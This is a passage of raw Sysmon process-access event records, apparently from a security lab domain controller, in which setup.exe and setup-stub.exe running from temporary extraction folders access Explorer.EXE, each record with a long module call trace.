dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 